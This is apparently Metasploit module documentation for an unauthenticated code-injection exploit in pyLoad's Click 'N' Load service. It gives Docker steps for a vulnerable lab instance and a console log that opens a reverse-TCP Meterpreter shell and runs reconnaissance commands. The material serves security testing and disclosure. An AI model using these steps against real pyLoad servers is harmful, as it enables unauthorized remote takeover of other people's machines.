## Vulnerable Application

pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport
functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request
to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services,
the primary of which is on port 8000 and can not be used by external hosts. A secondary "Click 'N' Load" service runs on
port 9666 and can be used remotely without authentication.

## Verification Steps

1. Start a vulnerable instance of pyLoad using docker
2. Start msfconsole
3. Run: `use exploit/linux/http/pyload_js2py_exec`
4. Set the `RHOST`, `PAYLOAD` and payload associated options
5. Run: `run`

### Docker Setup

```
docker run -d \
  --name=pyload-ng \
  -e PUID=1000 \
  -e PGID=1000 \
  -e TZ=Etc/UTC \
  -p 8000:8000 \
  -p 9666:9666 \
  --restart unless-stopped \
  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30
```

## Options

## Scenarios

### pyLoad 0.5.0b3.dev30 via Docker

```
msf6 > use exploit/linux/http/pyload_js2py_exec 
[*] Using configured payload cmd/unix/generic
msf6 exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf6 exploit(linux/http/pyload_js2py_exec) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (24380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500

meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer     : f03ec089a4fe
OS           : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/config/data
meterpreter > 
```
